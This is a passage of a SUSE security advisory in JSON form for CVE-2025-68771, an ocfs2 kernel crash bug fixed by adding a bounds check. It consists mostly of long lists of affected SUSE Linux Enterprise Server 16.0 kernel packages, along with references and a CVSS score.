"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix kernel BUG in ocfs2_find_victim_chain\n\nsyzbot reported a kernel BUG in ocfs2_find_victim_chain() because the\n`cl_next_free_rec` field of the allocation chain list (next free slot in\nthe chain list) is 0, triggring the BUG_ON(!cl-\u003ecl_next_free_rec)\ncondition in ocfs2_find_victim_chain() and panicking the kernel.\n\nTo fix this, an if condition is introduced in ocfs2_claim_suballoc_bits(),\njust before calling ocfs2_find_victim_chain(), the code block in it being\nexecuted when either of the following conditions is true:\n\n1. `cl_next_free_rec` is equal to 0, indicating that there are no free\nchains in the allocation chain list\n2. `cl_next_free_rec` is greater than `cl_count` (the total number of\nchains in the allocation chain list)\n\nEither of them being true is indicative of the fact that there are no\nchains left for usage.\n\nThis is addressed using ocfs2_error(), which prints\nthe error log for debugging purposes, rather than panicking the kernel.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68771",
"url": "https://www.suse.com/security/cve/CVE-2025-68771"
},
{
"category": "external",
"summary": "SUSE Bug 1256582 for CVE-2025-68771",
"url": "https://bugzilla.suse.com/1256582"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
